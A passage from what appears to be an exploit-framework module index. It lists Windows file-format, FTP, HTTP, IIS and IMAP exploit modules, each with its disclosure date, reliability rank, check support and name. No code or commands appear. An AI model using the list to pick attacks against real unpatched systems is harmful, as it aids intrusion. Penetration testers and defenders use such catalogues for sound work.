windows/fileformat/ursoft_w32dasm 2005-01-24 good No URSoft W32Dasm Disassembler Function Buffer Overflow - windows/fileformat/varicad_dwb 2010-03-17 great No VariCAD 2010-2.05 EN (DWB File) Stack Buffer Overflow - windows/fileformat/videocharge_studio 2013-10-27 normal No VideoCharge Studio Buffer Overflow (SEH) - windows/fileformat/videolan_tivo 2008-10-22 good No VideoLAN VLC TiVo Buffer Overflow - windows/fileformat/videospirit_visprj 2011-04-11 good No VeryTools Video Spirit Pro - windows/fileformat/visio_dxf_bof 2010-05-04 good No Microsoft Office Visio VISIODWG.DLL DXF File Handling Vulnerability - windows/fileformat/visiwave_vwr_type 2011-05-20 great No VisiWave VWR File Parsing Vulnerability - windows/fileformat/vlc_mkv 2018-05-24 great No VLC Media Player MKV Use After Free - windows/fileformat/vlc_modplug_s3m 2011-04-07 average No VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow - windows/fileformat/vlc_realtext 2008-11-05 good No VLC Media Player RealText Subtitle Overflow - windows/fileformat/vlc_smb_uri 2009-06-24 great No VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow - windows/fileformat/vlc_webm 2011-01-31 good No VideoLAN VLC MKV Memory Corruption - windows/fileformat/vuplayer_cue 2009-08-18 good No VUPlayer CUE Buffer Overflow - windows/fileformat/vuplayer_m3u 2009-08-18 good No VUPlayer M3U Buffer Overflow - windows/fileformat/watermark_master 2013-11-01 normal No Watermark Master Buffer Overflow (SEH) - windows/fileformat/winamp_maki_bof 2009-05-20 normal No Winamp MAKI Buffer Overflow - windows/fileformat/winrar_name_spoofing 2009-09-28 excellent No WinRAR Filename Spoofing - windows/fileformat/wireshark_mpeg_overflow 2014-03-20 good No Wireshark wiretap/mpeg.c Stack Buffer Overflow - windows/fileformat/wireshark_packet_dect 2011-04-18 good No Wireshark packet-dect.c Stack Buffer Overflow (local) - windows/fileformat/wm_downloader_m3u 2010-07-28 normal No WM Downloader 3.1.2.2 Buffer Overflow - windows/fileformat/xenorate_xpl_bof 2009-08-19 great No Xenorate 2.50 (.xpl) Universal Local Buffer Overflow (SEH) - windows/fileformat/xion_m3u_sehbof 2010-11-23 great No Xion Audio Player 1.0.126 Unicode Stack Buffer Overflow - windows/fileformat/xradio_xrl_sehbof 2011-02-08 normal No xRadio 0.95b Buffer Overflow - windows/fileformat/zahir_enterprise_plus_csv 2018-09-28 normal No Zahir Enterprise Plus 6 Stack Buffer Overflow - windows/fileformat/zinfaudioplayer221_pls 2004-09-24 good No Zinf Audio Player 2.2.1 (PLS File) Stack Buffer Overflow - windows/firewall/blackice_pam_icq 2004-03-18 great No ISS PAM.dll ICQ Parser Buffer Overflow - windows/firewall/kerio_auth 2003-04-28 average No Kerio Firewall 2.1.4 Authentication Packet Overflow - windows/ftp/32bitftp_list_reply 2010-10-12 good No 32bit FTP Client Stack Buffer Overflow - windows/ftp/3cdaemon_ftp_user 2005-01-04 average Yes 3Com 3CDaemon 2.0 FTP Username Overflow - windows/ftp/aasync_list_reply 2010-10-12 good No AASync v2.2.1.0 (Win32) Stack Buffer Overflow (LIST) - windows/ftp/ability_server_stor 2004-10-22 normal Yes Ability Server 2.34 STOR Command Stack Buffer Overflow - windows/ftp/absolute_ftp_list_bof 2011-11-09 normal No AbsoluteFTP 1.9.6 - 2.2.10 LIST Command Remote Buffer Overflow - windows/ftp/ayukov_nftp 2017-10-21 normal No Ayukov NFTP FTP Client Buffer Overflow - windows/ftp/bison_ftp_bof 2011-08-07 normal Yes BisonWare BisonFTP Server Buffer Overflow - windows/ftp/cesarftp_mkd 2006-06-12 average Yes Cesar FTP 0.99g MKD Command Buffer Overflow - windows/ftp/comsnd_ftpd_fmtstr 2012-06-08 good Yes ComSndFTP v1.3.7 Beta USER Format String (Write4) Vulnerability - windows/ftp/dreamftp_format 2004-03-03 good Yes BolinTech Dream FTP Server 1.02 Format String - windows/ftp/easyfilesharing_pass 2006-07-31 average Yes Easy File Sharing FTP Server 2.0 PASS Overflow - windows/ftp/easyftp_cwd_fixret 2010-02-16 great Yes EasyFTP Server CWD Command Stack Buffer Overflow - windows/ftp/easyftp_list_fixret 2010-07-05 great Yes EasyFTP Server LIST Command Stack Buffer Overflow - windows/ftp/easyftp_mkd_fixret 2010-04-04 great Yes EasyFTP Server MKD Command Stack Buffer Overflow - windows/ftp/filecopa_list_overflow 2006-07-19 average No FileCopa FTP Server Pre 18 Jul Version - windows/ftp/filewrangler_list_reply 2010-10-12 good No FileWrangler 5.30 Stack Buffer Overflow - windows/ftp/freefloatftp_user 2012-06-12 normal Yes Free Float FTP Server USER Command Buffer Overflow - windows/ftp/freefloatftp_wbem 2012-12-07 excellent Yes FreeFloat FTP Server Arbitrary File Upload - windows/ftp/freeftpd_pass 2013-08-20 normal Yes freeFTPd PASS Command Buffer Overflow - windows/ftp/freeftpd_user 2005-11-16 average Yes freeFTPd 1.0 Username Overflow - windows/ftp/ftpgetter_pwd_reply 2010-10-12 good No FTPGetter Standard v3.55.0.05 Stack Buffer Overflow (PWD) - windows/ftp/ftppad_list_reply 2010-10-12 good No FTPPad 1.2.0 Stack Buffer Overflow - windows/ftp/ftpshell51_pwd_reply 2010-10-12 good No FTPShell 5.1 Stack Buffer Overflow - windows/ftp/ftpshell_cli_bof 2017-03-04 normal No FTPShell client 6.70 (Enterprise edition) Stack Buffer Overflow - windows/ftp/ftpsynch_list_reply 2010-10-12 good No FTP Synchronizer Professional 4.0.73.274 Stack Buffer Overflow - windows/ftp/gekkomgr_list_reply 2010-10-12 good No Gekko Manager FTP Client Stack Buffer Overflow - windows/ftp/globalscapeftp_input 2005-05-01 great No GlobalSCAPE Secure FTP Server Input Overflow - windows/ftp/goldenftp_pass_bof 2011-01-23 average Yes GoldenFTP PASS Stack Buffer Overflow - windows/ftp/httpdx_tolog_format 2009-11-17 great Yes HTTPDX tolog() Function Format String Vulnerability - windows/ftp/kmftp_utility_cwd 2015-08-23 normal Yes Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow - windows/ftp/labf_nfsaxe 2017-05-15 normal No LabF nfsAxe 3.7 FTP Client Stack Buffer Overflow - windows/ftp/leapftp_list_reply 2010-10-12 good No LeapFTP 3.0.1 Stack Buffer Overflow - windows/ftp/leapftp_pasv_reply 2003-06-09 normal No LeapWare LeapFTP v2.7.3.600 PASV Reply Client Overflow - windows/ftp/ms09_053_ftpd_nlst 2009-08-31 great No MS09-053 Microsoft IIS FTP Server NLST Response Overflow - windows/ftp/netterm_netftpd_user 2005-04-26 great Yes NetTerm NetFTPD USER Buffer Overflow - windows/ftp/odin_list_reply 2010-10-12 good No Odin Secure FTP 4.1 Stack Buffer Overflow (LIST) - windows/ftp/open_ftpd_wbem 2012-06-18 excellent Yes Open-FTPD 1.2 Arbitrary File Upload - windows/ftp/oracle9i_xdb_ftp_pass 2003-08-18 great Yes Oracle 9i XDB FTP PASS Overflow (win32) - windows/ftp/oracle9i_xdb_ftp_unlock 2003-08-18 great Yes Oracle 9i XDB FTP UNLOCK Overflow (win32) - windows/ftp/pcman_put 2015-08-07 normal Yes PCMAN FTP Server Buffer Overflow - PUT Command - windows/ftp/pcman_stor 2013-06-27 normal Yes PCMAN FTP Server Post-Authentication STOR Command Stack Buffer Overflow - windows/ftp/proftp_banner 2009-08-25 normal No ProFTP 2.9 Banner Remote Buffer Overflow - windows/ftp/quickshare_traversal_write 2011-02-03 excellent Yes QuickShare File Server 1.2.1 Directory Traversal Vulnerability - windows/ftp/ricoh_dl_bof 2012-03-01 normal Yes Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow - windows/ftp/sami_ftpd_list 2013-02-27 low No Sami FTP Server LIST Command Buffer Overflow - windows/ftp/sami_ftpd_user 2006-01-24 normal Yes KarjaSoft Sami FTP Server v2.02 USER Overflow - windows/ftp/sasser_ftpd_port 2004-05-10 average No Sasser Worm avserve FTP PORT Buffer Overflow - windows/ftp/scriptftp_list 2011-10-12 good No ScriptFTP LIST Remote Buffer Overflow - windows/ftp/seagull_list_reply 2010-10-12 good No Seagull FTP v3.3 Build 409 Stack Buffer Overflow - windows/ftp/servu_chmod 2004-12-31 normal Yes Serv-U FTP Server Buffer Overflow - windows/ftp/servu_mdtm 2004-02-26 good Yes Serv-U FTPD MDTM Overflow - windows/ftp/slimftpd_list_concat 2005-07-21 great No SlimFTPd LIST Concatenation Overflow - windows/ftp/trellian_client_pasv 2010-04-11 normal No Trellian FTP Client 3.01 PASV Remote Buffer Overflow - windows/ftp/turboftp_port 2012-10-03 great Yes Turbo FTP Server 1.30.823 PORT Overflow - windows/ftp/vermillion_ftpd_port 2009-09-23 great Yes Vermillion FTP Daemon PORT Command Memory Corruption - windows/ftp/warftpd_165_pass 1998-03-19 average No War-FTPD 1.65 Password Overflow - windows/ftp/warftpd_165_user 1998-03-19 average No War-FTPD 1.65 Username Overflow - windows/ftp/wftpd_size 2006-08-23 average No Texas Imperial Software WFTPD 3.23 SIZE Overflow - windows/ftp/winaxe_server_ready 2016-11-03 good No WinaXe 7.7 FTP Client Remote Buffer Overflow - windows/ftp/wing_ftp_admin_exec 2014-06-19 excellent Yes Wing FTP Server Authenticated Command Execution - windows/ftp/wsftp_server_503_mkd 2004-11-29 great Yes WS-FTP Server 5.03 MKD Overflow - windows/ftp/wsftp_server_505_xmd5 2006-09-14 average Yes Ipswitch WS_FTP Server 5.05 XMD5 Overflow - windows/ftp/xftp_client_pwd 2010-04-22 normal No Xftp FTP Client 3.0 PWD Remote Buffer Overflow - windows/ftp/xlink_client 2009-10-03 normal No Xlink FTP Client Buffer Overflow - windows/ftp/xlink_server 2009-10-03 good Yes Xlink FTP Server Buffer Overflow - windows/games/mohaa_getinfo 2004-07-17 great No Medal of Honor Allied Assault getinfo Stack Buffer Overflow - windows/games/racer_503beta5 2008-08-10 great No Racer v0.5.3 Beta 5 Buffer Overflow - windows/games/ut2004_secure 2004-06-18 good Yes Unreal Tournament 2004 "secure" Overflow (Win32) - windows/http/adobe_robohelper_authbypass 2009-09-23 excellent No Adobe RoboHelp Server 8 Arbitrary File Upload and Execute - windows/http/altn_securitygateway 2008-06-02 average Yes Alt-N SecurityGateway username Buffer Overflow - windows/http/altn_webadmin 2003-06-24 average No Alt-N WebAdmin USER Buffer Overflow - windows/http/amlibweb_webquerydll_app 2010-08-03 normal Yes Amlibweb NetOpacs webquery.dll Stack Buffer Overflow - windows/http/apache_chunked 2002-06-19 good Yes Apache Win32 Chunked Encoding - windows/http/apache_mod_rewrite_ldap 2006-07-28 great Yes Apache Module mod_rewrite LDAP Protocol Buffer Overflow - windows/http/apache_modjk_overflow 2007-03-02 great Yes Apache mod_jk 1.2.20 Buffer Overflow - windows/http/avaya_ccr_imageupload_exec 2012-06-28 excellent No Avaya IP Office Customer Call Reporter ImageUpload.ashx Remote Command Execution - windows/http/badblue_ext_overflow 2003-04-20 great Yes BadBlue 2.5 EXT.dll Buffer Overflow - windows/http/badblue_passthru 2007-12-10 great No BadBlue 2.72b PassThru Buffer Overflow - windows/http/bea_weblogic_jsessionid 2009-01-13 good No BEA WebLogic JSESSIONID Cookie Value Overflow - windows/http/bea_weblogic_post_bof 2008-07-17 great Yes Oracle Weblogic Apache Connector POST Request Buffer Overflow - windows/http/bea_weblogic_transfer_encoding 2008-09-09 great No BEA Weblogic Transfer-Encoding Buffer Overflow - windows/http/belkin_bulldog 2009-03-08 average No Belkin Bulldog Plus Web Service Buffer Overflow - windows/http/ca_arcserve_rpc_authbypass 2011-07-25 excellent No CA Arcserve D2D GWT RPC Credential Information Disclosure - windows/http/ca_igateway_debug 2005-10-06 average Yes CA iTechnology iGateway Debug Mode Buffer Overflow - windows/http/ca_totaldefense_regeneratereports 2011-04-13 excellent No CA Total Defense Suite reGenerateReports Stored Procedure SQL Injection - windows/http/cogent_datahub_command 2014-04-29 manual Yes Cogent DataHub Command Injection - windows/http/cogent_datahub_request_headers_bof 2013-07-26 normal Yes Cogent DataHub HTTP Server Buffer Overflow - windows/http/coldfusion_fckeditor 2009-07-03 excellent No ColdFusion 8.0.1 Arbitrary File Upload and Execute - windows/http/cyclope_ess_sqli 2012-08-08 excellent Yes Cyclope Employee Surveillance Solution v6 SQL Injection - windows/http/desktopcentral_file_upload 2013-11-11 excellent Yes ManageEngine Desktop Central AgentLogUpload Arbitrary File Upload - windows/http/desktopcentral_statusupdate_upload 2014-08-31 excellent Yes ManageEngine Desktop Central StatusUpdate Arbitrary File Upload - windows/http/disk_pulse_enterprise_bof 2016-10-03 excellent Yes Disk Pulse Enterprise Login Buffer Overflow - windows/http/disk_pulse_enterprise_get 2017-08-25 excellent Yes Disk Pulse Enterprise GET Buffer Overflow - windows/http/diskboss_get_bof 2016-12-05 excellent Yes DiskBoss Enterprise GET Buffer Overflow - windows/http/disksavvy_get_bof 2016-12-01 excellent Yes DiskSavvy Enterprise GET Buffer Overflow - windows/http/disksorter_bof 2017-03-15 great Yes Disk Sorter Enterprise GET Buffer Overflow - windows/http/dup_scout_enterprise_login_bof 2017-11-14 excellent Yes Dup Scout Enterprise Login Buffer Overflow - windows/http/dupscts_bof 2017-03-15 great Yes Dup Scout Enterprise GET Buffer Overflow - windows/http/easychatserver_seh 2017-10-09 normal No Easy Chat Server User Registeration Buffer Overflow (SEH) - windows/http/easyfilesharing_post 2017-06-12 normal No Easy File Sharing HTTP Server 7.2 POST Buffer Overflow - windows/http/easyfilesharing_seh 2015-12-02 normal No Easy File Sharing HTTP Server 7.2 SEH Overflow - windows/http/easyftp_list 2010-02-18 great Yes EasyFTP Server list.html path Stack Buffer Overflow - windows/http/edirectory_host 2006-10-21 great No Novell eDirectory NDS Server Host Header Overflow - windows/http/edirectory_imonitor 2005-08-11 great No eDirectory 8.7.3 iMonitor Remote Stack Buffer Overflow - windows/http/efs_easychatserver_username 2007-08-14 great Yes EFS Easy Chat Server Authentication Request Handling Buffer Overflow - windows/http/efs_fmws_userid_bof 2014-05-20 normal Yes Easy File Management Web Server Stack Buffer Overflow - windows/http/ektron_xslt_exec 2012-10-16 excellent Yes Ektron 8.02 XSLT Transform Remote Code Execution - windows/http/ektron_xslt_exec_ws 2015-02-05 excellent Yes Ektron 8.5, 8.7, 9.0 XSLT Transform Remote Code Execution - windows/http/ericom_access_now_bof 2014-06-02 normal Yes Ericom AccessNow Server Buffer Overflow - windows/http/ezserver_http 2012-06-18 excellent No EZHomeTech EzServer Stack Buffer Overflow Vulnerability - windows/http/fdm_auth_header 2009-02-02 great No Free Download Manager Remote Control Server Buffer Overflow - windows/http/generic_http_dll_injection 2015-03-04 manual No Generic Web Application DLL Injection - windows/http/geutebrueck_gcore_x64_rce_bo 2017-01-24 normal Yes Geutebrueck GCore - GCoreServer.exe Buffer Overflow RCE - windows/http/gitstack_rce 2018-01-15 great No GitStack Unsanitized Argument RCE - windows/http/hp_autopass_license_traversal 2014-01-10 great Yes HP AutoPass License Server File Upload - windows/http/hp_imc_bims_upload 2013-10-08 excellent Yes HP Intelligent Management Center BIMS UploadServlet Directory Traversal - windows/http/hp_imc_java_deserialize 2017-10-03 excellent Yes HP Intelligent Management Java Deserialization RCE - windows/http/hp_imc_mibfileupload 2013-03-07 great Yes HP Intelligent Management Center Arbitrary File Upload - windows/http/hp_loadrunner_copyfiletoserver 2013-10-30 excellent Yes HP LoadRunner EmulationAdmin Web Service Directory Traversal - windows/http/hp_mpa_job_acct 2011-12-21 excellent Yes HP Managed Printing Administration jobAcct Remote Command Execution - windows/http/hp_nnm_getnnmdata_hostname 2010-05-11 great No HP OpenView Network Node Manager getnnmdata.exe (Hostname) CGI Buffer Overflow - windows/http/hp_nnm_getnnmdata_icount 2010-05-11 great No HP OpenView Network Node Manager getnnmdata.exe (ICount) CGI Buffer Overflow - windows/http/hp_nnm_getnnmdata_maxage 2010-05-11 great No HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow - windows/http/hp_nnm_nnmrptconfig_nameparams 2011-01-10 normal No HP OpenView NNM nnmRptConfig nameParams Buffer Overflow - windows/http/hp_nnm_nnmrptconfig_schdparams 2011-01-10 normal No HP OpenView NNM nnmRptConfig.exe schdParams Buffer Overflow - windows/http/hp_nnm_openview5 2007-12-06 great No HP OpenView Network Node Manager OpenView5.exe CGI Buffer Overflow - windows/http/hp_nnm_ovalarm_lang 2009-12-09 great No HP OpenView Network Node Manager ovalarm.exe CGI Buffer Overflow - windows/http/hp_nnm_ovas 2008-04-02 good Yes HP OpenView NNM 7.53, 7.51 OVAS.EXE Pre-Authentication Stack Buffer Overflow - windows/http/hp_nnm_ovbuildpath_textfile 2011-11-01 normal No HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow - windows/http/hp_nnm_ovwebhelp 2009-12-09 great No HP OpenView Network Node Manager OvWebHelp.exe CGI Buffer Overflow - windows/http/hp_nnm_ovwebsnmpsrv_main 2010-06-16 great No HP OpenView Network Node Manager ovwebsnmpsrv.exe main Buffer Overflow - windows/http/hp_nnm_ovwebsnmpsrv_ovutil 2010-06-16 great No HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow - windows/http/hp_nnm_ovwebsnmpsrv_uro 2010-06-08 great No HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow - windows/http/hp_nnm_snmp 2009-12-09 great No HP OpenView Network Node Manager Snmp.exe CGI Buffer Overflow - windows/http/hp_nnm_snmpviewer_actapp 2010-05-11 great No HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow - windows/http/hp_nnm_toolbar_01 2009-01-07 great No HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow - windows/http/hp_nnm_toolbar_02 2009-01-21 normal No HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling Buffer Overflow - windows/http/hp_nnm_webappmon_execvp 2010-07-20 great No HP OpenView Network Node Manager execvp_nc Buffer Overflow - windows/http/hp_nnm_webappmon_ovjavalocale 2010-08-03 great No HP NNM CGI webappmon.exe OvJavaLocale Buffer Overflow - windows/http/hp_openview_insight_backdoor 2011-01-31 excellent No HP OpenView Performance Insight Server Backdoor Account Code Execution - windows/http/hp_pcm_snac_update_certificates 2013-09-09 excellent Yes HP ProCurve Manager SNAC UpdateCertificatesServlet File Upload - windows/http/hp_pcm_snac_update_domain 2013-09-09 excellent Yes HP ProCurve Manager SNAC UpdateDomainControllerServlet File Upload - windows/http/hp_power_manager_filename 2011-10-19 normal No HP Power Manager 'formExportDataLogs' Buffer Overflow - windows/http/hp_power_manager_login 2009-11-04 average No Hewlett-Packard Power Manager Administration Buffer Overflow - windows/http/hp_sitescope_dns_tool 2015-10-09 good No HP SiteScope DNS Tool Command Injection - windows/http/hp_sitescope_runomagentcommand 2013-07-29 manual Yes HP SiteScope Remote Code Execution - windows/http/httpdx_handlepeer 2009-10-08 great Yes HTTPDX h_handlepeer() Function Buffer Overflow - windows/http/httpdx_tolog_format 2009-11-17 great Yes HTTPDX tolog() Function Format String Vulnerability - windows/http/ia_webmail 2003-11-03 average No IA WebMail 3.x Buffer Overflow - windows/http/ibm_tivoli_endpoint_bof 2011-05-31 good No IBM Tivoli Endpoint Manager POST Query Buffer Overflow - windows/http/ibm_tpmfosd_overflow 2007-05-02 good No IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow - windows/http/ibm_tsm_cad_header 2007-09-24 good No IBM Tivoli Storage Manager Express CAD Service Buffer Overflow - windows/http/icecast_header 2004-09-28 great No Icecast Header Overwrite - windows/http/integard_password_bof 2010-09-07 great No Race River Integard Home/Pro LoginAdmin Password Stack Buffer Overflow - windows/http/intersystems_cache 2009-09-29 great No InterSystems Cache UtilConfigHome.csp Argument Buffer Overflow - windows/http/intrasrv_bof 2013-05-30 manual Yes Intrasrv 1.0 Buffer Overflow - windows/http/ipswitch_wug_maincfgret 2004-08-25 great No Ipswitch WhatsUp Gold 8.03 Buffer Overflow - windows/http/jira_collector_traversal 2014-02-26 normal Yes JIRA Issues Collector Directory Traversal - windows/http/kaseya_uploader 2015-09-23 excellent Yes Kaseya VSA uploader.aspx Arbitrary File Upload - windows/http/kaseya_uploadimage_file_upload 2013-11-11 excellent Yes Kaseya uploadImage Arbitrary File Upload - windows/http/kolibri_http 2010-12-26 good Yes Kolibri HTTP Server HEAD Buffer Overflow - windows/http/landesk_thinkmanagement_upload_asp 2012-02-15 excellent No LANDesk Lenovo ThinkManagement Console Remote Command Execution - windows/http/lexmark_markvision_gfd_upload 2014-12-09 excellent Yes Lexmark MarkVision Enterprise Arbitrary File Upload - windows/http/mailenable_auth_header 2005-04-24 great Yes MailEnable Authorization Header Buffer Overflow - windows/http/manage_engine_opmanager_rce 2015-09-14 manual Yes ManageEngine OpManager Remote Code Execution - windows/http/manageengine_adshacluster_rce 2018-06-28 excellent Yes Manage Engine Exchange Reporter Plus Unauthenticated RCE - windows/http/manageengine_appmanager_exec 2018-03-07 excellent Yes ManageEngine Applications Manager Remote Code Execution - windows/http/manageengine_apps_mngr 2011-04-08 average No ManageEngine Applications Manager Authenticated Code Execution - windows/http/manageengine_connectionid_write 2015-12-14 excellent Yes ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability - windows/http/maxdb_webdbm_database 2006-08-29 good No MaxDB WebDBM Database Parameter Overflow - windows/http/maxdb_webdbm_get_overflow 2005-04-26 good No MaxDB WebDBM GET Buffer Overflow - windows/http/mcafee_epolicy_source 2006-07-17 average Yes McAfee ePolicy Orchestrator / ProtectionPilot Overflow - windows/http/mdaemon_worldclient_form2raw 2003-12-29 great Yes MDaemon WorldClient form2raw.cgi Stack Buffer Overflow - windows/http/minishare_get_overflow 2004-11-07 average No Minishare 1.4.1 Buffer Overflow - windows/http/miniweb_upload_wbem 2013-04-09 excellent Yes MiniWeb (Build 300) Arbitrary File Upload - windows/http/navicopa_get_overflow 2006-09-28 great Yes NaviCOPA 2.0.1 URL Handling Buffer Overflow - windows/http/netdecision_http_bof 2012-02-24 normal Yes NetDecision 4.5.1 HTTP Server Buffer Overflow - windows/http/netgear_nms_rce 2016-02-04 excellent Yes NETGEAR ProSafe Network Management System 300 Arbitrary File Upload - windows/http/novell_imanager_upload 2010-10-01 excellent No Novell iManager getMultiPartParameters Arbitrary File Upload - windows/http/novell_mdm_lfi 2013-03-13 excellent Yes Novell Zenworks Mobile Managment MDM.php Local File Inclusion Vulnerability - windows/http/novell_messenger_acceptlang 2006-04-13 average No Novell Messenger Server 2.0 Accept-Language Overflow - windows/http/nowsms 2008-02-19 good No Now SMS/MMS Gateway Buffer Overflow - windows/http/octopusdeploy_deploy 2017-05-15 excellent Yes Octopus Deploy Authenticated Code Execution - windows/http/oracle9i_xdb_pass 2003-08-18 great Yes Oracle 9i XDB HTTP PASS Overflow (win32) - windows/http/oracle_beehive_evaluation 2010-06-09 excellent Yes Oracle BeeHive 2 voice-servlet processEvaluation() Vulnerability - windows/http/oracle_beehive_prepareaudiotoplay 2015-11-10 excellent Yes Oracle BeeHive 2 voice-servlet prepareAudioToPlay() Arbitrary File Upload - windows/http/oracle_btm_writetofile 2012-08-07 excellent No Oracle Business Transaction Management FlashTunnelService Remote Code Execution - windows/http/oracle_endeca_exec 2013-07-16 excellent Yes Oracle Endeca Server Remote Command Execution - windows/http/oracle_event_processing_upload 2014-04-21 excellent Yes Oracle Event Processing FileUploadServlet Arbitrary File Upload - windows/http/osb_uname_jlist 2010-07-13 excellent No Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability - windows/http/peercast_url 2006-03-08 average No PeerCast URL Handling Buffer Overflow - windows/http/php_apache_request_headers_bof 2012-05-08 normal No PHP apache_request_headers Function Buffer Overflow - windows/http/privatewire_gateway 2006-06-26 average No Private Wire Gateway Buffer Overflow - windows/http/psoproxy91_overflow 2004-02-20 average Yes PSO Proxy v0.91 Stack Buffer Overflow - windows/http/rabidhamster_r4_log 2012-02-09 normal Yes RabidHamster R4 Log Entry sprintf() Buffer Overflow - windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution - windows/http/sambar6_search_results 2003-06-21 normal Yes Sambar 6 Search Results Buffer Overflow - windows/http/sap_configservlet_exec_noauth 2012-11-01 great Yes SAP ConfigServlet Remote Code Execution - windows/http/sap_host_control_cmd_exec 2012-08-14 average Yes SAP NetWeaver HostControl Command Injection - windows/http/sapdb_webtools 2007-07-05 great No SAP DB 7.4 WebTools Buffer Overflow - windows/http/savant_31_overflow 2002-09-10 great Yes Savant 3.1 Web Server Overflow - windows/http/sepm_auth_bypass_rce 2015-07-31 excellent No Symantec Endpoint Protection Manager Authentication Bypass and Code Execution - windows/http/serviio_checkstreamurl_cmd_exec 2017-05-03 excellent Yes Serviio Media Server checkStreamUrl Command Execution - windows/http/servu_session_cookie 2009-11-01 good Yes Rhinosoft Serv-U Session Cookie Buffer Overflow - windows/http/shoutcast_format 2004-12-23 average Yes SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow - windows/http/shttpd_post 2006-10-06 average No SHTTPD URI-Encoded POST Request Overflow - windows/http/solarwinds_fsm_userlogin 2015-03-13 excellent Yes Solarwinds Firewall Security Manager 6.6.5 Client Session Handling Vulnerability - windows/http/solarwinds_storage_manager_sql 2011-12-07 excellent Yes Solarwinds Storage Manager 5.1.0 SQL Injection - windows/http/sonicwall_scrutinizer_sqli 2012-07-22 excellent Yes Dell SonicWALL (Plixer) Scrutinizer 9 SQL Injection - windows/http/steamcast_useragent 2008-01-24 average Yes Streamcast HTTP User-Agent Buffer Overflow - windows/http/sws_connection_bof 2012-07-20 normal Yes Simple Web Server Connection Header Buffer Overflow - windows/http/sybase_easerver 2005-07-25 average No Sybase EAServer 5.2 Remote Stack Buffer Overflow - windows/http/syncbreeze_bof 2017-03-15 great Yes Sync Breeze Enterprise GET Buffer Overflow - windows/http/sysax_create_folder 2012-07-29 normal No Sysax Multi Server 5.64 Create Folder Buffer Overflow - windows/http/trackercam_phparg_overflow 2005-02-18 average Yes TrackerCam PHP Argument Buffer Overflow - windows/http/trackit_file_upload 2014-10-07 excellent Yes Numara / BMC Track-It! FileStorageService Arbitrary File Upload - windows/http/trendmicro_officescan 2007-06-28 good No Trend Micro OfficeScan Remote Stack Buffer Overflow - windows/http/trendmicro_officescan_widget_exec 2017-10-07 excellent Yes Trend Micro OfficeScan Remote Code Execution - windows/http/ultraminihttp_bof 2013-07-10 normal No Ultra Mini HTTPD Stack Buffer Overflow - windows/http/umbraco_upload_aspx 2012-06-28 excellent No Umbraco CMS Remote Command Execution - windows/http/vmware_vcenter_chargeback_upload 2013-05-15 excellent Yes VMware vCenter Chargeback Manager ImageUploadServlet Arbitrary File Upload - windows/http/vxsrchs_bof 2017-03-15 great Yes VX Search Enterprise GET Buffer Overflow - windows/http/webster_http 2002-12-02 average No Webster HTTP Server GET Buffer Overflow - windows/http/xampp_webdav_upload_php 2012-01-14 excellent No XAMPP WebDAV PHP Upload - windows/http/xitami_if_mod_since 2007-09-24 average Yes Xitami 2.5c2 Web Server If-Modified-Since Overflow - windows/http/zenworks_assetmgmt_uploadservlet 2011-11-02 excellent No Novell ZENworks Asset Management Remote Execution - windows/http/zenworks_uploadservlet 2010-03-30 excellent No Novell ZENworks Configuration Management Remote Execution - windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Yes Microsoft IIS WebDav ScStoragePathFromUrl Overflow - windows/iis/iis_webdav_upload_asp 1994-01-01 excellent No Microsoft IIS WebDAV Write Access Code Execution - windows/iis/ms01_023_printer 2001-05-01 good Yes MS01-023 Microsoft IIS 5.0 Printer Host Header Overflow - windows/iis/ms01_026_dbldecode 2001-05-15 excellent Yes MS01-026 Microsoft IIS/PWS CGI Filename Double Decode Command Execution - windows/iis/ms01_033_idq 2001-06-18 good No MS01-033 Microsoft IIS 5.0 IDQ Path Overflow - windows/iis/ms02_018_htr 2002-04-10 good No MS02-018 Microsoft IIS 4.0 .HTR Path Overflow - windows/iis/ms02_065_msadc 2002-11-20 normal Yes MS02-065 Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow - windows/iis/ms03_007_ntdll_webdav 2003-05-30 great Yes MS03-007 Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow - windows/iis/msadc 1998-07-17 excellent Yes MS99-025 Microsoft IIS MDAC msadcs.dll RDS Arbitrary Remote Command Execution - windows/imap/eudora_list 2005-12-20 great Yes Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow - windows/imap/imail_delete 2004-11-12 average No IMail IMAP4D Delete Overflow - windows/imap/ipswitch_search 2007-07-18 average No Ipswitch IMail IMAP SEARCH Buffer Overflow - windows/imap/mailenable_login 2006-12-11 great No MailEnable IMAPD (2.34/2.35) Login Request Buffer Overflow - windows/imap/mailenable_status 2005-07-13 great No MailEnable IMAPD (1.54) STATUS Request Buffer Overflow - windows/imap/mailenable_w3c_select 2005-10-03 great Yes MailEnable IMAPD W3C Logging Buffer Overflow - windows/imap/mdaemon_cram_md5 2004-11-12 great No Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow - windows/imap/mdaemon_fetch 2008-03-13 great Yes MDaemon 9.6.4 IMAPD FETCH Buffer Overflow - windows/imap/mercur_imap_select_overflow 2006-03-17 average No Mercur v5.0 IMAP SP3 SELECT Buffer Overflow - windows/imap/mercur_login 2006-03-17 average No Mercur Messaging 2005 IMAP Login Buffer Overflow - windows/imap/mercury_login 2007-03-06 normal Yes Mercury/32 4.01 IMAP LOGIN SEH Buffer Overflow - windows/imap/mercury_rename 2004-11-29 average Yes Mercury/32 v4.01a IMAP RENAME Buffer Overflow - windows/imap/novell_netmail_append 2006-12-23 average No Novell NetMail IMAP APPEND Buffer Overflow - windows/imap/novell_netmail_auth 2007-01-07 average No Novell NetMail IMAP 